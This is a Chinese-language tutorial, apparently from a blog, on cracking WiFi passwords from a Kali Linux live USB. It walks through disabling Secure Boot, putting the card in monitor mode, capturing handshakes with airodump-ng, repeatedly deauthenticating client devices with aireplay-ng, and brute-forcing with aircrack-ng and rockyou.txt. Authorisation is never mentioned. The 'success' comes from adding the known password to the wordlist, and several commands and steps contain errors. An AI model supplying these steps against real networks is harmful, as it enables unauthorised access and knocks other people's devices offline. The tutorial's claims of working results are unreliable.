Kali Linux破解wifi密码教程(无须外置网卡)
关键词:Kali Linux、Kali Linux新手教程 Kali Linux学习视频教程:(如失效请在公众号私信我) 链接: 提取码:gxea 环境准备: 方式一(选择该方式):Kali Linux、笔记本一台、U盘(至少8G) 方式二:Kali Linux、外置网卡、笔记本一台、VM 特别说明,主要是使用方式一进行破解,如果有外置网卡,那就非常简单了,直接通过vm外接网卡即可。 注:制作kali启动镜像前,U盘里的数据一定要备份、备份、备份。 1.balenaEtcher安装 该软件是用来制作镜像的工具,也可以使用其它的。不过不推荐,试过其它几款,还不如这个一键制作好用。 balenaEtcher - Flash OS images to SD cards & USB drives
2.制作kali启动镜像 等待3-5分钟.注:在制作过程中,会弹出'初始化'的窗口,取消或者关闭就行,不要点击格式化,否则会让制作的镜像白费,需要重新来一次。 完成。 3.开机启动设置 (1).进入bios界面 自己的电脑型号对应不同按键的启动bios方式不同,常用的笔记本型号的进入bios方式。如下图所示,其它型号的可自行百度往下看。(如,百度搜索'华硕笔记本进入bios按键')。
(2).设置启动项的顺序 设置U盘启动项的顺序可自行百度,比较简单,这里不再叙述。 如果出现'Secure Boot Violation'等信息,那么我们就需要关闭笔记本的保护模式。方法大同小异,这是界面外观可能不一样,内容是一样的。当完成实验后,要把系统保护改回来。 [1].传统方式具体操作步骤往下看: ①.进入Bios设定页面
②.security页面 进入[Security]页面(1),选择Secure Boot项目 ③.安全启动功能关闭 选择[Secure Boot Control]项目(3),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Disable]。
④. 保存设定并退出 进入[Save & Exit]页面(5),选择Save Changes and Exit后并选择Yes。 [2].UEFI方式具体操作步骤往下看: ①.进入BIOS设定页面后,使用快捷键[F7]、或是鼠标点选(1)进入进阶模式。
②.进入[Security]页面,选择[Secure Boot]项目。 ③.安全启动功能关闭 选择[Secure Boot Control]项目(4),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Disable]。
④.存储设定并退出 进入[Save & Exit]页面(6),选择Save Changes and Exit后并选择Yes。或者按F10保存 4.启动kali 注意:这一步一定不能马虎,一定要快速选择'kali live'模式,一定不能选择'install kali',也不能长时间不动,否则就等着重装系统、数据不见等一系列的问题。
5.无线wifi破解实验 (1).ifconfig 命令ifconfig查看网卡信息,有wlan0表示网卡能够用来破解wifi。 root@kali:~#ifconfig (2).airmon-ng 使用命令airmon-ng start wlan0开启网卡监听模式。 root@kali:~#airmon-ng start wlan0
(3).iwconfig 使用iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示'监听模式'开启成功。 root@kali:~#iwconfig (4).airodump-ng扫描 使用命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务。 root@kali:~#airodump-ng wlan0mon
参数 意义 BSSID wifi的MAC地址 PWR 信号强弱程度,数值越小信号越强 DATA 数据量,越大使用的人就越多 CH 信道频率(频道) ESSID wifi的名称,中文可能会有乱码 (5).抓包 接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon。注,--bssid后面跟着的是'BSSID(MAC地址)',-c后面跟着的是'CH(信道)',-w后面跟着抓到的包保存到哪,最后是网卡信息'wlan0mon'。 如:我想要破解ESSID为TP-LINK_961A4A的无线wifi,格式为: root@kali:~#airodump-ng --bssid 38:83:45:96:1A:4A -c -w /opt/catchWiFi wlan0mon 数据包已经正在抓取,等待一会,如果抓取不到数据.接着往下看
另起终端,输入格式为'airepaly-ng -0 0 -c STATION(任选其一) -a bssid 网卡名(一般为wlan0mon)'。不过STATION最好选择手机的热点,如果不清楚手机的mac地址那么可以任选其一,选择手机的好处是可以手动设置断线,让其抓取到包。如果运气不好,那么就试四个把。
如:我想要攻击STATION(MAC地址)为,格式为: root@kali:~# aireplay-ng -0 0 -c 38:83:45:96:1A:4A -a 14:95:CE:BB:53:A8 wlan0mon 每个参数的意义 (0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码, 数据包里面的密码是哈希加密的,哈希加密只能正向)
当'airodump-ng --bssid BSSID'窗口出现WPA handshake时,表示抓包成功。这里有一个小技巧让其抓到包,让手机连接的wifi断开,然后重新连接wifi。简单说,把手机WiFi重新关开即可。 出现'WPA handshake时'时,需要让两个终端都按Ctrl+c停止,不然会一直断网的。
查看抓到的数据包.cd打开抓包的目录,ls列出来,就看到我们抓到的数据包 (6).解压kali字典文件 解压kali自带的字典文件.路径:/usr/share/wordlists/rockyou.txt.gz root@kali:~#gzip -d/usr/share/wordlists/rockyou.txt.gz
(7).跑包(破解密码) 格式:aircrack-ng -w 字典路径 握手包路径,回车后开始爆破。 运气有一些差,抓到了三个cap包,一个没跑成功。但是怎么能放弃,毛主席说过,没有条件创造条件。如果抱着一定要跑出来的决心,就接着往下看。 root@kali:~#aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-01.cap root@kali:~#aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-02.cap root@kali:~#aircrack-ng -w /usr/share/wordlists/rockyou.txt /opt/catchWifi-03.cap
方法,就是把我们正确的wifi密码加入到'密码字典(rockyou.txt)'中去。然后重新来一次,跑包。成功了。。。。。。。 #添加'root123..'到rockyou密码字典中 root@kali:~#vim /usr/share/wordlists/rockyou.txt root123..
特别说明:暴力破解并不简单,需要足够强大的字典和时间,可以通过字典生成工具生成自己的字典,字典越强大越容易破解。 其它密码字典:链接:提取码:23fp 6.恢复保护系统 [1].传统方式'安全启动功能开启'具体操作步骤往下看: 选择[Secure Boot Control]项目(3),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Enabled]。
[2].UEFI方式'安全启动功能开启'具体操作步骤往下看: 选择[Secure Boot Control]项目(4),并设定为Disabled。部分机种可能只有[Secure Boot]而没有[Secure Boot Control],则请选择[Secure Boot]并设定为[Enabled]。看右手有保存的提示,华硕的是F10保存。